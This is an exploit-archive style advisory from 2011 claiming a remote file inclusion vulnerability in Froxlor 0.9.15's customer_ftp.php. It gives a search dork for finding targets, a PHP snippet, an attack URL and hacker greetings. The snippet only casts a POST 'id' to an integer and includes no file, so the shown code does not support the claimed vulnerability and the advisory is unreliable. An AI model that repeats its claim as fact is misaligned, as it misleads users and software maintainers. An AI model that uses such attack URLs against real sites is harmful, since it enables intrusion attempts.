Froxlor v 0.9.15 Remote File Inclusion Vulnerbility

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Froxlor v 0.9.15 Remote File Inclusion Vulnerbility
# Published : 2011-01-26
# Author : DIES3L
# Previous Title : vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities
# Next Title : RW-Download v4.0.6 (index.php) SQL Injection Vulnerability

# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerbility
# Google Dork: ? 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################

Fichier : customer_ftp.php
http://localhost/[path]/customer_ftp.php

Code :
<?php
require ("./lib/init.php");

$id = intval($_POST['id']);
?>

Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x

Have Enjoy :)

##############################################################
                                                             #
Gr33t'z t0 :                                                 #
WwW.p0c.cc - WwW.D99Y.CoM - WwW.v4-Team.com - ALL My Friends #
                                                             #
##############################################################